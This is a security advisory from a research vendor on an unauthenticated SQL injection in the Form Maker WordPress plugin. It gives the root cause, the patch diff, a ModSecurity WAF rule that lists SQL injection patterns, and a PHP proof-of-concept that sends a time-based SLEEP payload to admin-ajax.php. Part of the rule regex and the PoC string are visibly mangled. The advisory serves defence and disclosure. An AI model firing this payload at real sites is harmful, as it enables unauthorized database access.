Atomic Edge analysis of CVE-2026-39502:
The Form Maker WordPress plugin version 1.15.38 and earlier contains an unauthenticated SQL injection vulnerability. This flaw exists in the frontend form submission processing logic, allowing attackers to inject malicious SQL payloads. The vulnerability carries a CVSS score of 7.5 (High severity), enabling information disclosure from the WordPress database.
Root Cause:
The vulnerability originates in the `form-maker/frontend/controllers/form_maker.php` file. The `form_maker` controller processes user-submitted form data and dynamically replaces placeholder tokens within SQL query parameters. At line 319 in the vulnerable version, the code directly replaces the `{input_id}` token with the raw user-supplied `$input_val` without proper sanitization. This unsanitized value is then incorporated into SQL queries executed by the plugin’s database layer, creating a classic SQL injection vector.
Exploitation:
Attackers exploit this vulnerability by submitting specially crafted form data to the plugin’s frontend submission endpoint. The payload uses the pipe-delimited format `input_id|injection_payload` where `injection_payload` contains SQL injection syntax. When the plugin processes this submission, it extracts the `input_val` portion and directly inserts it into SQL queries. An attacker could use UNION-based or time-based blind SQL injection techniques to extract sensitive data like user credentials, form submissions, or WordPress configuration details.
Patch Analysis:
The patch modifies line 319-321 in `form-maker/frontend/controllers/form_maker.php`. Instead of directly replacing the token with raw user input, the patched code first passes the `$input_val` through `$wpdb->prepare(‘%s’, $input_val)`. This WordPress database function properly escapes the value for safe SQL usage. The patch then trims the surrounding single quotes added by `prepare()` using `trim(…, “‘”)` before performing the string replacement. This ensures all user input is properly escaped before inclusion in SQL queries, eliminating the injection vulnerability.
Impact:
Successful exploitation allows unauthenticated attackers to execute arbitrary SQL queries on the WordPress database. Attackers can extract sensitive information including WordPress user credentials (hashed passwords), personally identifiable information from form submissions, plugin configuration data, and other database contents. In multi-site installations, this could lead to compromise of all sites within the network. The vulnerability does not directly enable remote code execution or file system access.
Below is a differential between the unpatched vulnerable code and the patched update, for reference.
--- a/form-maker/form-maker.php
+++ b/form-maker/form-maker.php
@@ -3,7 +3,7 @@
* Plugin Name: Form Maker
* Plugin URI: https://10web.io/plugins/wordpress-form-maker/?utm_source=form_maker&utm_medium=free_plugin
* Description: This plugin is a modern and advanced tool for easy and fast creating of a WordPress Form. The backend interface is intuitive and user friendly which allows users far from scripting and programming to create WordPress Forms.
- * Version: 1.15.38
+ * Version: 1.15.39
* Author: 10Web Form Builder Team
* Author URI: https://10web.io/plugins/?utm_source=form_maker&utm_medium=free_plugin
* License: GNU/GPLv3 http://www.gnu.org/licenses/gpl-3.0.html
@@ -26,8 +26,8 @@
public $plugin_url = '';
public $front_urls = array();
public $main_file = '';
- public $plugin_version = '1.15.38';
- public $db_version = '2.15.38';
+ public $plugin_version = '1.15.39';
+ public $db_version = '2.15.39';
public $menu_postfix = '_fm';
public $plugin_postfix = '';
public $handle_prefix = 'fm';
--- a/form-maker/frontend/controllers/form_maker.php
+++ b/form-maker/frontend/controllers/form_maker.php
@@ -316,7 +316,9 @@
list($input_id, $input_val) = explode('|', $val);
$str_key = '{'. $input_id .'}';
if ( strpos($params, $str_key) > -1 ) {
- $params = str_replace( $str_key, $input_val, $params );
+ // Escape for safe use inside SQL WHERE (params can end up in DB-backed choice queries).
+ $safe_val = trim( $wpdb->prepare( '%s', $input_val ), "'" );
+ $params = str_replace( $str_key, $safe_val, $params );
}
}
$html = $this->view->$type( $params, $row, $form_id, $row_id, $type, $param );
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-39502
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php"
"id:202639502,phase:2,deny,status:403,chain,msg:'CVE-2026-39502 SQL Injection via Form Maker plugin',severity:'CRITICAL',tag:'CVE-2026-39502',tag:'WordPress',tag:'Plugin/Form-Maker',tag:'attack.sql-injection'"
SecRule ARGS_POST:action "@streq form_maker_submit" "chain"
SecRule ARGS_POST:form_data "@rx |.*(?:sleep(s*d+s*)|benchmark(|waitfors+delay|pg_sleep(|unions+(?:alls+)?select|selects+.*from|inserts+into|updates+.*set|deletes+from|drops+table|creates+table|execs*(|--|#|/*|*/)"
"t:lowercase,t:urlDecodeUni,t:removeNulls,t:removeWhitespace"
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-39502 - Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder <= 1.15.38 - Unauthenticated SQL Injection
<?php
$target_url = "http://target-site.com/"; // Configure target URL
// The exploit targets form submissions processed by the vulnerable plugin
// This PoC demonstrates a time-based blind SQL injection payload
$payload = array(
'form_data' => '1|1' AND SLEEP(5)-- ', // Pipe-delimited format: input_id|injection_payload
'form_id' => '1', // Valid form ID
'action' => 'form_maker_submit', // Plugin AJAX action
'nonce' => '' // Nonce may not be required for unauthenticated exploitation
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
$start_time = microtime(true);
$response = curl_exec($ch);
$end_time = microtime(true);
$elapsed_time = $end_time - $start_time;
if ($elapsed_time >= 5) {
echo "[+] Vulnerability confirmed! Response delayed by " . round($elapsed_time, 2) . " seconds.n";
echo "[+] The site is vulnerable to CVE-2026-39502.n";
} else {
echo "[-] No time delay detected. Site may be patched or payload failed.n";
}
curl_close($ch);
?>
